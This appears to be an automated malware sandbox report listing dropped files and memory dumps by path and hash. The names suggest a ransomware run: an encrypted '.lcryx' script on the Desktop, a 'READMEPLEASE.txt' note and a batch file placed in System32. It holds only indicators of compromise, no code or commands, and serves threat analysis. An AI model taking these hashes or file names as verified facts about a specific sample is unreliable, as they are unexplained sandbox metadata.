93d84b2988809a3937d9bda1e950c910cb7d5d5310f3aeede1e077f9bc0c604c7c8dc97070658b2a5de83bde18e4ff3c0910a831549e2714652764d6231ad03b

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B3513D73A177A2707D910183759B389B_56F1C8A5D236355FC34CFBE3B2731F85

Filesize
398B

MD5
998f3dcce0e5e5b25c9801f56c4a8bc9

SHA1
5283d1bfd27ab8c3424c329bd7bce7d8466ba8a9

SHA256
e63b64620d30d15d1155b8c1f7298fa31bf364a4552e38092241d78e413813f0

SHA512
2df7df3dd7fa043257813efc23fc25c20f3e76fc35817206665b6c25fb9662b42901fcd5a8d491a01594b533db0cec07f8929fa3f6849b2cca649a459eefd0e9

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B3513D73A177A2707D910183759B389B_56F1C8A5D236355FC34CFBE3B2731F85

Filesize
398B

MD5
f9312badcb75db5f350c0331b2248627

SHA1
1a52d10f8f39cfdca1ad0d75bceac6960f2515eb

SHA256
94339298b18962f790032e1839dc7786bf3fba9d5404a712d14464055963b693

SHA512
a2cebb0f2702c81329adae915acf883fbe45a71651c5271f4935cfa8993afe0d5332e5781f26212eee40ad186e3134a35e515f534e89268e9d7a93bdbdff36c0

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B3513D73A177A2707D910183759B389B_56F1C8A5D236355FC34CFBE3B2731F85

Filesize
398B

MD5
732d4b5bbb897f81041bb21301d72e30

SHA1
e116ac87ad58bf0d10ffcd80dd86220a0644278c

SHA256
bbfe4b46b7e487a41ba44bd9c5a88429a159f625a4de836aff224b4a4ea33b76

SHA512
72c32eb93b87f6ce8d4b150085955b00f4ae7bdb9b72b4de88df84a4b08b37c109e7b0dc3505660bead4410540b8aae3a29bfcb30117e09409274f17dffa8f2c

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\EDC238BFF48A31D55A97E1E93892934B_C20E0DA2D0F89FE526E1490F4A2EE5AB

Filesize
396B

MD5
6be35b82da72101597c09d43f9d19b0d

SHA1
0ff8eb993d7b92ae50ae8567e20772930d0308ba

SHA256
ea60a45121ba53620dee4d352f3225eac281de7e91fe2934146e7cbbd1bf6de3

SHA512
7d33671d2eaa9c79c35ad5f0e576594745dd41623677dc002b827f61441c97754b03b0806512958b00ef0cfb48b691038c4b0632ebafde891fffb8d359aea86e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{23D72521-8DEB-11EF-8BF0-428107983482}.dat

Filesize
5KB

MD5
2da5cea82db5ad5cd87004af55993595

SHA1
8771703c5d010c83f89511e341e07847f0ee7692

SHA256
07dee2f4bdfc6bb47e36473f75160dc27eee04161ec91c21b19305ee81b27a74

SHA512
805d935147a325db9ffc276a817d79791b03039f6ba8724ea07adba703cfe8e06a3f971fb48af4bcdde291549ba293523cb1c869e3ee6546b2ab8bf234d06336

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{23DE4941-8DEB-11EF-8BF0-428107983482}.dat

Filesize
3KB

MD5
1f92fa35de23850f7b8a2fd319e93898

SHA1
c07ee748324ccd42cd067b1dc06304264f8b7280

SHA256
8db33c2f9fa1d9669e13a886962208d313184f025b071d606bf4b6cf92ee3e90

SHA512
539003cba25d65f8ab0a32d4228c32653c361cb438bbb01604ea101d0a4f5fe19a793e871fb1e0cba433a3dba81c81368f7c967e8817ed29356000965471fdb7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{23E56D61-8DEB-11EF-8BF0-428107983482}.dat

Filesize
5KB

MD5
ebec0b179415471e89bd72b307872e7c

SHA1
fbc2f1eea875c54891e5991491bb599c5b16634d

SHA256
d79132a8de5029666c137ca958bfaa06ebfbf9d3e28de076298ed337f9efef3b

SHA512
4e3a28014d3d811d690c5f89c54be3c03763dc6c54909b01c01cc234ad7f85bf75d3b0908e9dec1724bdf76ff7a345de858fdcb5fc622446821ab4a5e4fb44da

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{23E56D61-8DEB-11EF-8BF0-428107983482}.dat

Filesize
5KB

MD5
eeb306594caf2ae2dafb59e2f7f2cd97

SHA1
2c0a65f5452dff9401dd580413fa53524f6ba13d

SHA256
c167719b057a51a810378b0ae73924d06d2c8b7835698e5871d538d183dc2f35

SHA512
3de7e902b1e6bcae84661cf9580bfa296bbad612f874b4bde039f0627a95d1043d6cbe65c86751fd0347f54a2a31e38bca8bd723e23084e00582c940091315ee

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{23E7CEC1-8DEB-11EF-8BF0-428107983482}.dat

Filesize
3KB

MD5
d859b08990e33c3ef67c00b2d745ec43

SHA1
728b480a56ae20663e8fa7ae63af1bf0e36ecbcb

SHA256
7e000e26dd0b3bbb1af73a98b80174b82dc31e4b97a9b5c4dcdab874b7ed68cd

SHA512
0d937b442ab40ee265f2f6de8a876c24716288f0d5f7f512eeaff3a48d3252348d360425fbc846f9874b609f870a9e3a2161927803578a1252f5248ea6531c44

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{23F32131-8DEB-11EF-8BF0-428107983482}.dat

Filesize
3KB

MD5
8b3488ca1175c52f79e152df97b6addb

SHA1
77ed4f3ebf62c5affe46f6c0ab8ef9fed5d09f6b

SHA256
d000ac186af9d654a26e0b8170b71ce9210a094e89602d1730ee44db63bbaed1

SHA512
f1ee2e1e93add51780ad9c0cacb3a382d209abf9b1902d7cb93c3cd0b7a831c1d574e2bfebc186fb30a9d8fc6bf1a8b304ef9e22a934a2608cf6917836a0333c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{23FD8171-8DEB-11EF-8BF0-428107983482}.dat

Filesize
3KB

MD5
1d9fe2b81bb9c75d2788d97be3a53a03

SHA1
879934a43dc04a2ddde4306a5cd0182421ba3840

SHA256
9e3675f326a8c626dc76756fb5b962586976d7aed96dfbec8ee50a3ffb75617d

SHA512
854b4db5d901915347f1624dca4f4bdfd4229af24713ca89882a7c95cd9d4668d96208d12d9fb366901834be5c413e695484427ca3873f9a78b8656a3c7a2385

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{24039BF1-8DEB-11EF-8BF0-428107983482}.dat

Filesize
5KB

MD5
7b7fb321e05485a1b6d219f819f7d494

SHA1
5294ece1fc1f429ab7f66329130482637ba3200a

SHA256
f3889a28f3e18d38a89b6e15c54898061338a624326032666ca81f76df27368f

SHA512
82abcc316c5f3c714a4eb8aef7662adcd1e89425856107b5e3f937684866f7f38ce841a025450f80f787661fb3e45bfece488f372540a0b51af16808228b9677

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{240E4A51-8DEB-11EF-8BF0-428107983482}.dat

Filesize
5KB

MD5
daf7c9dc9e215f722d91c6b48035378f

SHA1
20230dfe79b53185392ec8dc0664089ed125bade

SHA256
92299bbcdabad3e2f9f926a970da0af1848d33acd9c4db12d2e074f440aaa28e

SHA512
0d6af7fa8e7df962eed7ce43d5b46172dd6c589337f5d521d0db204d743a77c765336a1074b507f773a7cd41bd654d3b372de748114accfeb7dbeeb4dbc7f4b0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{24135361-8DEB-11EF-8BF0-428107983482}.dat

Filesize
3KB

MD5
45564ae265c4435ca775dfc1db8a7c96

SHA1
29f1bfef23f2ce510006bac1bcb72141605b34bb

SHA256
27d64ec016e69e5e3bb6a30d1d5ce1c89c3a4ca5170d77e79b009dac15db20b2

SHA512
26923b4caa2d2edaf84327a1437d0c59753a0832a7744711557b979460a9a948aa6ca672109af25528a1300ebce872fe4c22a83ae21c443eef8373fdfba44d25

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{24135361-8DEB-11EF-8BF0-428107983482}.dat

Filesize
5KB

MD5
3166df7f1a2aea3cfe3e78ea137fe198

SHA1
a5da70a2765f86d688118a9a5978ae887aa5ea08

SHA256
f873230b8067852732132209b2b8eabf63240cd78905fb7db2940a4f50d6c555

SHA512
e18a78135a2ab9be7f55c696b7630c455fe585520fc2cc03400203fd1f82ed1e7daa4c494ea07fcdd0a20417db8f96e11945e6702172c22f70bfdb816cc7973e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{241A3131-8DEB-11EF-8BF0-428107983482}.dat

Filesize
3KB

MD5
e1b3f6288bf7e4735c5ed23250116ba2

SHA1
2fd34df5e2deda1254719237dcce5f8ca95ae42b

SHA256
123b08e55c97e65bcf9c20d71d4aa109261e4825e679e0916d29c131da5fb76e

SHA512
19b59ec4a719cbe484dd39a5ea4889047ca8ff8f4c10481b60295ff16be547947382dd5bad42bc1150abf70f7e305a81676596999fe25a0740faed12f2f524f0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{241E28D1-8DEB-11EF-8BF0-428107983482}.dat

Filesize
4KB

MD5
1ee2f076d3a5ee84c2f63d8e90e0ac71

SHA1
d15f2bca2404de0f8429a90ad675f44ad4e7659b

SHA256
6b42b731eb2171029260e4aab43a719b03ec87b3b55da861d6e88a28902e7a07

SHA512
ca7fa96599ce5d99c31cce7ff3b3f9b944ac9661dffda156663d2bafec481ecafd54ee6994f3ba6cda66fa3eb84eb72c0a42a1fc346ee88c51d8c77580322356

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{241E28D1-8DEB-11EF-8BF0-428107983482}.dat

Filesize
3KB

MD5
bd68c12c1dea539c227141e7179a3f96

SHA1
02f496471e02c32ec453ea43b03c9b9f6dd7c1bd

SHA256
3234d67b9f7bfb90eb6e7181235294b75f5a4ec70ae39e0d021df5c7e6294034

SHA512
1fd48ee30a25ece5c4ab785b80304d35bb61655f46c3b80fc089022ef84be73a4b5ebca95fea67a60f3749d0cb2e653ff9133582049183aecb70f9d02cf135de

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{24218431-8DEB-11EF-8BF0-428107983482}.dat

Filesize
4KB

MD5
8a2088e3648bb43eaab1d3b898167669

SHA1
e53bf28be31b7b9aedec8674715e64852925d7d3

SHA256
b604118fee01738182c2497263a874ecbbfcd1c50cee8cbe6dc5f676229ab2d9

SHA512
d7c9f419474f3eca4a8d03bd99ccdf17192ab6eaa873b9e2897ba04664a70b306ca460b53efd147a8e822ce7d57d353605dad07afd29f738784906b322f9fd2c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{24261811-8DEB-11EF-8BF0-428107983482}.dat

Filesize
3KB

MD5
e5a16fc35836988c41f1b6b627abb724

SHA1
952ee54f3c2ce62a894e326a44f2940c2bb2e787

SHA256
b344d8fea7c5d2f5db89bd23573f5db73499bfe687afcf11aba502022cfed554

SHA512
558701a5275416b03a39a3edbd2beb3cb3053b92504e097773dcd1a7601df4121e93a94141c995ed0d0b67412f8e4b2375aadf9c3b1fafe1664aee46d4947d77

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{24388EA1-8DEB-11EF-8BF0-428107983482}.dat

Filesize
5KB

MD5
b5d4045c328f0876397ed9b723e1c84e

SHA1
960ee152691fd563b3e816a9e9c49f0b9928d81e

SHA256
8bfe901c2494fde384608b193511a288b29ba73aa4be00454dcc2dbd83219613

SHA512
0c54ae73eff7bce8a8ba5e0213b6b4684cc29cda1dc0ee669134c0be3155cea6ec3984ce63220902de5eb044a5dc3fce1c14df4dfc0f4df57175b37688899d78

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\0qn8gcy\imagestore.dat

Filesize
1KB

MD5
c6e2c37b5f39586fe80ad33005ffd51d

SHA1
932044fd5b61d62d803ec11ca635c7bf36dd4dca

SHA256
397ee0b575a4faa3b12d350f85a9af4cb231ffd25c31401539a510d561040993

SHA512
8bc6527279e8b3318d6c5f30f4d34e296e6a392e01a7bbbab86a48ce03364b4b5a2d0f7e384d16cb444b93ccb23167d10bc11d6740e99b24ebd4a9aee0554d9e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\0qn8gcy\imagestore.dat

Filesize
3KB

MD5
874a5ed0de7d42dea0cf73ac21763d30

SHA1
879a92acb1a4f2878abdf8b6cc8c0610aafbc974

SHA256
9601cac8322f832b1e1409e513a6a699e4083d2c3025bf3bfaeac0e151be3e5e

SHA512
98eb8d2d64e7ed3af346c477ec4061103ba94a684044314072e3be843e7c809cf06cfe4d62dcca4477feb7ba40bbc44e393158e6f6f941ac28ca127a020f657e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\0qn8gcy\imagestore.dat

Filesize
4KB

MD5
d976591ef8820f020cda5b11c4020200

SHA1
973a2d68c57b3dcbe0a41531ad01821268e3852d

SHA256
769ce6bd3d82bb63f9885c7733284b67188fe9af712a63ba235e6dfe61e18144

SHA512
7dac11c4f7bbd43885a71d2bdee81485ecc9e3f3ddd7feb1527e27552b105e21e9fe92aaa56f15bc2a7758d829714a77ce5347a5346d337044510bffb6bff519

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\39GEHZPO\3a8e55c6-b1f3-4659-99eb-125ae72bd084[1].htm

Filesize
167B

MD5
0104c301c5e02bd6148b8703d19b3a73

SHA1
7436e0b4b1f8c222c38069890b75fa2baf9ca620

SHA256
446a6087825fa73eadb045e5a2e9e2adf7df241b571228187728191d961dda1f

SHA512
84427b656a6234a651a6d8285c103645b861a18a6c5af4abb5cb4f3beb5a4f0df4a74603a0896c7608790fbb886dc40508e92d5709f44dca05dd46c8316d15bf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\39GEHZPO\bullet[1]

Filesize
447B

MD5
26f971d87ca00e23bd2d064524aef838

SHA1
7440beff2f4f8fabc9315608a13bf26cabad27d9

SHA256
1d8e5fd3c1fd384c0a7507e7283c7fe8f65015e521b84569132a7eabedc9d41d

SHA512
c62eb51be301bb96c80539d66a73cd17ca2021d5d816233853a37db72e04050271e581cc99652f3d8469b390003ca6c62dad2a9d57164c620b7777ae99aa1b15

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\39GEHZPO\httpErrorPagesScripts[1]

Filesize
8KB

MD5
3f57b781cb3ef114dd0b665151571b7b

SHA1
ce6a63f996df3a1cccb81720e21204b825e0238c

SHA256
46e019fa34465f4ed096a9665d1827b54553931ad82e98be01edb1ddbc94d3ad

SHA512
8cbf4ef582332ae7ea605f910ad6f8a4bc28513482409fa84f08943a72cac2cf0fa32b6af4c20c697e1fac2c5ba16b5a64a23af0c11eefbf69625b8f9f90c8fa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\39GEHZPO\info_48[2]

Filesize
4KB

MD5
5565250fcc163aa3a79f0b746416ce69

SHA1
b97cc66471fcdee07d0ee36c7fb03f342c231f8f

SHA256
51129c6c98a82ea491f89857c31146ecec14c4af184517450a7a20c699c84859

SHA512
e60ea153b0fece4d311769391d3b763b14b9a140105a36a13dad23c2906735eaab9092236deb8c68ef078e8864d6e288bef7ef1731c1e9f1ad9b0170b95ac134

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\HHT5LGG0\ErrorPageTemplate[1]

Filesize
2KB

MD5
f4fe1cb77e758e1ba56b8a8ec20417c5

SHA1
f4eda06901edb98633a686b11d02f4925f827bf0

SHA256
8d018639281b33da8eb3ce0b21d11e1d414e59024c3689f92be8904eb5779b5f

SHA512
62514ab345b6648c5442200a8e9530dfb88a0355e262069e0a694289c39a4a1c06c6143e5961074bfac219949102a416c09733f24e8468984b96843dc222b436

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\HHT5LGG0\NewErrorPageTemplate[1]

Filesize
1KB

MD5
cdf81e591d9cbfb47a7f97a2bcdb70b9

SHA1
8f12010dfaacdecad77b70a3e781c707cf328496

SHA256
204d95c6fb161368c795bb63e538fe0b11f9e406494bb5758b3b0d60c5f651bd

SHA512
977dcc2c6488acaf0e5970cef1a7a72c9f9dc6bb82da54f057e0853c8e939e4ab01b163eb7a5058e093a8bc44ecad9d06880fdc883e67e28ac67fee4d070a4cc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\HHT5LGG0\down[1]

Filesize
748B

MD5
c4f558c4c8b56858f15c09037cd6625a

SHA1
ee497cc061d6a7a59bb66defea65f9a8145ba240

SHA256
39e7de847c9f731eaa72338ad9053217b957859de27b50b6474ec42971530781

SHA512
d60353d3fbea2992d96795ba30b20727b022b9164b2094b922921d33ca7ce1634713693ac191f8f5708954544f7648f4840bcd5b62cb6a032ef292a8b0e52a44

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LPQ313RR\dnserror[1]

Filesize
1KB

MD5
73c70b34b5f8f158d38a94b9d7766515

SHA1
e9eaa065bd6585a1b176e13615fd7e6ef96230a9

SHA256
3ebd34328a4386b4eba1f3d5f1252e7bd13744a6918720735020b4689c13fcf4

SHA512
927dcd4a8cfdeb0f970cb4ee3f059168b37e1e4e04733ed3356f77ca0448d2145e1abdd4f7ce1c6ca23c1e3676056894625b17987cc56c84c78e73f60e08fc0d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LPQ313RR\errorPageStrings[1]

Filesize
2KB

MD5
e3e4a98353f119b80b323302f26b78fa

SHA1
20ee35a370cdd3a8a7d04b506410300fd0a6a864

SHA256
9466d620dc57835a2475f8f71e304f54aee7160e134ba160baae0f19e5e71e66

SHA512
d8e4d73c76804a5abebd5dbc3a86dcdb6e73107b873175a8de67332c113fb7c4899890bf7972e467866fa4cd100a7e2a10a770e5a9c41cbf23b54351b771dcee

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LPQ313RR\favicon[1].ico

Filesize
1KB

MD5
f2a495d85735b9a0ac65deb19c129985

SHA1
f2e22853e5da3e1017d5e1e319eeefe4f622e8c8

SHA256
8bb1d0fa43a17436d59dd546f6f74c76dc44735def7522c22d8031166db8911d

SHA512
6ca6a89de3fa98ca1efcf0b19b8a80420e023f38ed00f4496dc0f821cea23d24fb0992cee58c6d089f093fdefca42b60bb3a0a0b16c97b9862d75b269ae8463b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LPQ313RR\http_403[1]

Filesize
4KB

MD5
3215e2e80aa8b9faba83d76aef71f1b9

SHA1
c7582d414ee6a1dae098f6dbbbf68ed9641d0023

SHA256
d91c22ef6451561f346b8c8bc6f98897e2e5c28135a421ee946800f6c8451b24

SHA512
690e4d62229ad14d3d842dabe986651b4cc2e4c873a50e5b7fc4fd539662a703690ecc70649acea7751e69ce6046489c0e6b05d24f0030d68773c67b3dcbae00

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\UQFHO95Z\KFOlCnqEu92Fr1MmEU9fBBc-[1].woff

Filesize
23KB

MD5
30ef7351c99d2cd25159e6fc71e6c6fc

SHA1
5e44b3f6ead8d9aba512a9efac3ec0015a01e6e6

SHA256
6ba203ebcc641340ab5eedea7652697bc6e7e11def4c8e2e85d7493e0d4b1e76

SHA512
375750efaff14bdb39507c00db04c279d93d1e01027afa58fde65146bf627081b9aadd0b7f8d59f569abca39ab6d9b89bf3d84f61da90786794c94ee91bb6439

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\UQFHO95Z\KFOmCnqEu92Fr1Mu4mxM[1].woff

Filesize
23KB

MD5
1ac185dda7da331babe18e8d84ec6984

SHA1
1ffcb05cec93b6cb5a43a280ebfb99fe1f729ce4

SHA256
f00fa16d99be425022af380773c6b55cb44898a4568052c1a728ff9a383c9095

SHA512
f24abd0a39a6fb4635b507ab0b86b69a4efe214f69f7b5e22ae5deffaf56e0c4e5b980493e1df3fcb8a385ec603a02c1aae00832fd09d444722cd15afe421ea2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\UQFHO95Z\Qw3hZQNGEDjaO2m6tqIqX5E-AVS5_rSejo46_PCTRspJ0OosolrBEJL3HMXfxQASluL2m_dANVawBpSF[1].woff

Filesize
18KB

MD5
d77dde5a38a8920bc8e0d7ffcf5e031c

SHA1
c4e4a8aba5c128b7d5be9eee8525da2cdbd4d760

SHA256
58cf604e2059ebd4fe016f9b7422cc4cd653a589239ac7b4ce27f964e5cb8967

SHA512
574f162bdf8ce1163fe7cb33984ce961aa4b46b3a3a342c487ae199dd71f31e70e3d5f900fff9c2b88e15b6505d3d204702cbd8882830b01a54f6f3bb791c4b9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\UQFHO95Z\background_gradient[1]

Filesize
453B

MD5
20f0110ed5e4e0d5384a496e4880139b

SHA1
51f5fc61d8bf19100df0f8aadaa57fcd9c086255

SHA256
1471693be91e53c2640fe7baeecbc624530b088444222d93f2815dfce1865d5b

SHA512
5f52c117e346111d99d3b642926139178a80b9ec03147c00e27f07aab47fe38e9319fe983444f3e0e36def1e86dd7c56c25e44b14efdc3f13b45ededa064db5a

Download Submit
C:\Users\Admin\AppData\Local\Temp\CabFA85.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\TarFA95.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
C:\Users\Admin\AppData\Local\Temp\~DFF666F84D33CA0787.TMP

Filesize
16KB

MD5
c9c48e686deeaf7bdfb37a8d423848f1

SHA1
1c85b558013d9a3a64441228a9360033dac1081a

SHA256
f99d5b6c8865a3293b72448e3db221d4f17174f4a1d4de6f72d23a823c441a18

SHA512
d1ad4a3c83beaf9229549562f75c71a3d6910c6a543ccebef58d97fa89befaf3dcc9a5a2625e8361ab1edee5feb35f76fd0593f1aaee79bbcd964ffa4e331182

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\OOGKVGE0.txt

Filesize
228B

MD5
83a94fd9ae1ba54f95b655e2cb1aa070

SHA1
657875ff98a51b69f3d3b1087463cdbf72302619

SHA256
69e1b560a3471c696ac464cd73e6d8cccd959de9173315b6ef9e19c5b70664a0

SHA512
33f56ba0dd67c44ab25d1f32d4c2ea78355eb33447d1f6c083bdb688ba37abb70cde5e60051a6f8bf1c1dba1ed71990253e746d1db5f3b35bba9588dc99be450

Download Submit
C:\Users\Admin\Desktop\BlockEnable.ps1.lcryx

Filesize
421KB

MD5
15d4f6a60e68692356b4c056abdbbc5a

SHA1
509c1f45fb392890a26d7ddd7e35e3cac7d381b6

SHA256
328508a04cdbf89b6601d78fdeb56826b3c44951bb7bd47c3c256e06857d4f21

SHA512
da149bda46fc8357d946bf3781bfb1cf3d959680fb1140dc2c55a6727727f66de0f2da89201f85fccce00209e0c3ddc30436e5b0da7b189b1873070fcf4b69a4

Download Submit
C:\Users\Admin\Desktop\READMEPLEASE.txt

Filesize
95B

MD5
316cdf8bc3bae069158a2b5ce6e6584b

SHA1
1fb87b0babb134777c858a5a0ca2b61257be7b88

SHA256
5185b861b4c7d2c74ec334178a1f9eb6bae84bfaefc11ef9f1aa88ca1d1ef211

SHA512
48e69c5958b7dce18dbcf0330aae01be09b8db685d5e080e24d88a4ae91f8cede980b19522b81d5a7c82cd70dd51a60c3d971d5775c7ef8fd5cefccd65520080

Download Submit
C:\Windows\System32\iamthedoom.bat

Filesize
320B

MD5
87b38705d72cc16189ca8043e1e7cdd7

SHA1
a7caa6d14276714b95eb394dc3be1a6fb479590c

SHA256
7306e8aef5accfe4f7b3796d2c16f1f88b2650e65ee9a9736554fd335f2875af

SHA512
48a7a2a1370973e141931f375254b645884f9467b59f7b0babb821f12382368350a6d4925af2da74221f0420f0ccb5a6133412536d6a5a3c32c8f7d527218294

Download Submit
memory/1540-5257-0x000007FEF53F0000-0x000007FEF543C000-memory.dmp

Filesize
304KB

Download
memory/1540-658-0x000007FEF53F0000-0x000007FEF543C000-memory.dmp

Filesize
304KB

Download
memory/1648-659-0x000007FEF53F0000-0x000007FEF543C000-memory.dmp

Filesize
304KB

Download
memory/1648-5350-0x000007FEF53F0000-0x000007FEF543C000-memory.dmp

Filesize
304KB

Download
memory/1664-5255-0x000007FEF53F0000-0x000007FEF543C000-memory.dmp

Filesize
304KB

Download
memory/1664-656-0x000007FEF53F0000-0x000007FEF543C000-memory.dmp

Filesize
304KB

Download
memory/1724-655-0x000007FEF53F0000-0x000007FEF543C000-memory.dmp

Filesize
304KB

Download
memory/1724-5254-0x000007FEF53F0000-0x000007FEF543C000-memory.dmp

Filesize
304KB

Download
memory/1844-5256-0x000007FEF53F0000-0x000007FEF543C000-memory.dmp

Filesize
304KB

Download
memory/1844-657-0x000007FEF53F0000-0x000007FEF543C000-memory.dmp

Filesize
304KB

Download
memory/2120-5702-0x000007FEF53F0000-0x000007FEF543C000-memory.dmp

Filesize
304KB

Download
memory/2260-5252-0x000007FEF53F0000-0x000007FEF543C000-memory.dmp

Filesize
304KB

Download
memory/2260-654-0x000007FEF53F0000-0x000007FEF543C000-memory.dmp

Filesize
304KB

Download
memory/4732-10298-0x000007FEF53F0000-0x000007FEF543C000-memory.dmp

Filesize
304KB

Download
memory/4732-2350-0x000007FEF53F0000-0x000007FEF543C000-memory.dmp

Filesize
304KB

Download
memory/4888-6089-0x000007FEF53F0000-0x000007FEF543C000-memory.dmp

Filesize
304KB

Download
memory/4888-737-0x000007FEF53F0000-0x000007FEF543C000-memory.dmp

Filesize
304KB

Download
memory/4952-7632-0x000007FEF53F0000-0x000007FEF543C000-memory.dmp

Filesize
304KB

Download
memory/5080-6090-0x000007FEF53F0000-0x000007FEF543C000-memory.dmp

Filesize
304KB

Download
memory/5480-9777-0x000007FEF53F0000-0x000007FEF543C000-memory.dmp

Filesize
304KB

Download
memory/5572-7631-0x000007FEF53F0000-0x000007FEF543C000-memory.dmp

Filesize
304KB

Download
memory/5572-1146-0x000007FEF53F0000-0x000007FEF543C000-memory.dmp

Filesize
304KB

Download
memory/5812-8066-0x000007FEF53F0000-0x000007FEF543C000-memory.dmp

Filesize
304KB

Download
memory/5812-1755-0x000007FEF53F0000-0x000007FEF543C000-memory.dmp

Filesize
304KB

Download
memory/6012-8634-0x000007FEF53F0000-0x000007FEF543C000-memory.dmp

Filesize
304KB

Download
memory/6012-1884-0x000007FEF53F0000-0x000007FEF543C000-memory.dmp

Filesize
304KB

Download
memory/6024-8400-0x000007FEF53F0000-0x000007FEF543C000-memory.dmp

Filesize
304KB

Download
memory/6108-9579-0x000007FEF53F0000-0x000007FEF543C000-memory.dmp

Filesize
304KB

Download
memory/6124-10471-0x000007FEF53F0000-0x000007FEF543C000-memory.dmp

Filesize
304KB

Download
memory/6700-10554-0x000007FEF53F0000-0x000007FEF543C000-memory.dmp

Filesize
304KB

Download
memory/6700-2860-0x000007FEF53F0000-0x000007FEF543C000-memory.dmp

Filesize
304KB

Download
memory/6828-10664-0x000007FEF53F0000-0x000007FEF543C000-memory.dmp

Filesize
304KB

Download
memory/6828-3251-0x000007FEF53F0000-0x000007FEF543C000-memory.dmp

Filesize
304KB

Download
memory/6844-9010-0x000007FEF53F0000-0x000007FEF543C000-memory.dmp

Filesize
304KB

Download
memory/6844-2033-0x000007FEF53F0000-0x000007FEF543C000-memory.dmp

Filesize
304KB

Download
memory/6856-8838-0x000007FEF53F0000-0x000007FEF543C000-memory.dmp

Filesize
304KB

Download
memory/6876-9840-0x000007FEF53F0000-0x000007FEF543C000-memory.dmp

Filesize
304KB

Download
memory/6876-2188-0x000007FEF53F0000-0x000007FEF543C000-memory.dmp

Filesize
304KB

Download
memory/7164-2471-0x000007FEF53F0000-0x000007FEF543C000-memory.dmp

Filesize
304KB

Download
memory/7164-10340-0x000007FEF53F0000-0x000007FEF543C000-memory.dmp

Filesize
304KB

Download
memory/7432-2754-0x000007FEF53F0000-0x000007FEF543C000-memory.dmp

Filesize
304KB

Download
memory/7432-10470-0x000007FEF53F0000-0x000007FEF543C000-memory.dmp

Filesize
304KB

